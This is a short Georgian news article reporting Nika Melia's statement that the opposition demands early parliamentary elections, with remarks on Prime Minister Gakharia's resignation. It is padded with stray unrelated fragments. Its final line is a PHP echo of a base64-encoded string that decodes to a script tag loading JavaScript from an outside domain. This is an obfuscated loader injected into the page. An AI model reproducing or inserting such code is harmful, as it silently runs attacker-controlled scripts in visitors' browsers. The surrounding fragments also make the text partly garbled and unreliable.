celsiusi
ავერსი შნაიდერი
„ნაციონალური მოძრაობის“ ლიდერი, ნიკა მელია ოპოზიციის სახელით განცხადებას აკეთებს და ამბობს, რომ ოპოზიცია ვადამდელი საპარლამენტო არჩევნების გამართვას ითხოვს.
 
მელიას თქმით, პირველ რიგში ოპოზიცია ელჩების ჩართულობით, ხელისუფლებასთან შეხვედრის ჩატარებას გეგმავს, სადაც სწორედ ვადამდელ არჩევნებზე უნდა ისაუბრონ.
 
„დღეს ჩვენ ერთგულები ვართ იმ გარდაუვალი ცვლილებებისა, რომელიც ქვეყანას კრიზისიდან გამოიყვანს და ეს არის ახალი ვადამდელი არჩევნები, რომელიც წესრიგში მოიყვანს ყველა სფეროს, დაწყებული სამართლებრივიდან, დამთავრებული სხვა წესრიგებამდე. ოპოზიციური პარტიების სახელით ვაკეთებ განცხადებას, უნდა მივუსხდეთ მოლაპარაკებების მაგიდას, რეჟიმის წარმომადგენლებთან, ფასილიტატორებთან ერთად და უნდა განვიხილოთ საკითხი, ახალი არჩევნების ჩატარებასთან დაკავშირებით“, - განაცხადა ნიკა მელიამ.
 
ის ეხმაურება პრემიერ-მინისტრის თანამდებობიდან გადადგომას და ამბობს, რომ როგორც ჩანს, „ქართული ოცნების“ ზოგიერთი წარმომადგენლის "გონება განათდა", ამ შემთხვევაში გიორგი გახარიასი, რომელმაც „სისხლისღვრისკენ მეორედ არ გადადგა ნაბიჯი, რომლისკენაც სავარაუდოდ გუნდის წევრები მოუწოდებდნენ. ბატონ გახარიას საკმარისი პოლიტიკური და ადამიანური ცოდვაც აქვს 20 ივნისთან დაკავშირებით“.
1596
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");